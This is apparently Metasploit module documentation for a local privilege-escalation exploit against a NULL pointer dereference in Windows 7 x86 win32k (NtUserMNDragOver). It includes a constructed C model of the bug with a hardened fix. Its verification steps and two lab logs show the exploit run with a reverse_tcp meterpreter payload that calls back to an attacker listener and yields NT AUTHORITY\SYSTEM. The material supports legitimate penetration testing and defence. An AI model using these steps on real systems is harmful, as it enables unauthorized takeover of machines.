## Vulnerable Application

This module exploits a NULL pointer dereference vulnerability in
MNGetpItemFromIndex(), which is reachable from user mode through the
NtUserMNDragOver() system call.

The NULL pointer dereference occurs because xxxMNFindWindowFromPoint()
does not adequately validate the tagPOPUPMENU objects it processes before
passing them on to MNGetpItemFromIndex(), which dereferences the object
it is handed; when that object is NULL, the kernel faults.

This module has been tested against Windows 7 x86 SP0 and SP1.
Offsets within the exploit may need to be adjusted to work with
other versions of Windows, such as Windows Server 2008. As with any
kernel exploit, a failed attempt can crash the target, so confirm the
OS build and architecture (for example with `sysinfo`) before running
it against anything other than a test system.
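
The pattern described above, reduced to a small user-mode model, is shown below as an added example. This is not win32k code and not part of the Metasploit module; every name in it (`find_menu_from_point`, `popup_menu_t`, the `magic` tag, the coordinate-based hit test) is a hypothetical stand-in constructed to illustrate the bug class: a lookup that can hand back a NULL or no-longer-valid object, and a callee that dereferences it without checking. The hardened variant shows the check the lookup path was missing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed model of the bug class in the text. Names are hypothetical,
 * not the real win32k structures or functions. */

#define ITEM_COUNT 4
#define POPUP_MAGIC 0x504F5055u   /* hypothetical validity tag ("POPU") */
#define NO_ITEM     0xFFFFFFFFu   /* sentinel returned by the checked path */

typedef struct popup_item { uint32_t id; } popup_item_t;

typedef struct popup_menu {
    uint32_t      magic;       /* set on a live object, cleared on teardown */
    uint32_t      item_count;
    popup_item_t *items;
} popup_menu_t;

/* Constructed sample data: one live menu and one stale (torn-down) object. */
static popup_item_t g_items[ITEM_COUNT] = { {10}, {11}, {12}, {13} };
static popup_menu_t g_menu  = { POPUP_MAGIC, ITEM_COUNT, g_items };
static popup_menu_t g_stale = { 0,           ITEM_COUNT, g_items };

/* Analogue of the "find window from point" step: a hit test that may return
 * NULL (nothing under the point) or an object that is no longer valid. */
static popup_menu_t *find_menu_from_point(int x, int y) {
    if (x < 0 || y < 0) return NULL;      /* no menu under this point */
    if (x > 100)        return &g_stale;  /* hypothetical stale object */
    return &g_menu;
}

/* Vulnerable callee: trusts its argument and dereferences it directly.
 * Handing it NULL is exactly the fault the module text describes. */
static uint32_t get_item_unchecked(popup_menu_t *menu, uint32_t idx) {
    return menu->items[idx].id;
}

/* Hardened callee: refuses NULL, stale objects and out-of-range indexes. */
static int get_item_checked(const popup_menu_t *menu, uint32_t idx, uint32_t *out) {
    if (menu == NULL || menu->magic != POPUP_MAGIC) return 0;
    if (menu->items == NULL || idx >= menu->item_count) return 0;
    *out = menu->items[idx].id;
    return 1;
}

/* Vulnerable path: hit-test, then index into the result with no validation.
 * Only safe to call for points that actually resolve to a live menu. */
uint32_t drag_over_unchecked(int x, int y, uint32_t idx) {
    return get_item_unchecked(find_menu_from_point(x, y), idx);
}

/* Hardened path: same flow, but the result of the hit test is validated
 * before it is dereferenced. Returns NO_ITEM instead of faulting. */
uint32_t drag_over_checked(int x, int y, uint32_t idx) {
    uint32_t id = NO_ITEM;
    if (!get_item_checked(find_menu_from_point(x, y), idx, &id)) return NO_ITEM;
    return id;
}

int main(void) {
    printf("live menu, unchecked: id=%u\n", drag_over_unchecked(5, 5, 2));
    printf("live menu, checked:   id=%u\n", drag_over_checked(5, 5, 2));
    printf("no menu, checked:     %s\n", drag_over_checked(-1, -1, 0) == NO_ITEM ? "rejected" : "id");
    printf("stale menu, checked:  %s\n", drag_over_checked(200, 5, 0) == NO_ITEM ? "rejected" : "id");
    /* drag_over_unchecked(-1, -1, 0) would dereference NULL: the bug class. */
    return 0;
}
```

The point of the model is where the check lives: the hit test is allowed to return nothing, so the consumer of its result must validate before dereferencing. In the real kernel the equivalent unchecked dereference runs in ring 0, which is what turns a user-controllable NULL into a privilege-escalation primitive rather than a simple crash of the caller.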

## Verification Steps

1. Get a non-SYSTEM x86 meterpreter session on Windows 7 x86
1. `use exploit/windows/local/ntusermndragover`
1. `set session <session>`
1. `set payload windows/meterpreter/reverse_tcp`
1. `set LHOST <LHOST>`
1. `set LPORT 5555`
1. `exploit`
1. Get a SYSTEM session

## Scenarios

### Windows 7 SP0 x86

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)

msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run

[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Reflectively injecting the exploit DLL and running the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 192.168.56.15
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800

meterpreter > sysinfo
Computer        : USER-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

### Windows 7 SP1 x86

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)

msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run

[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 2696 launched.
[*] Injecting exploit into 2696 ...
[*] Exploit injected. Injecting payload into 2696...
[*] Payload injected. Executing exploit...
[*] Sending stage (176195 bytes) to 192.168.56.5
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800

meterpreter > sysinfo
Computer        : USER-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
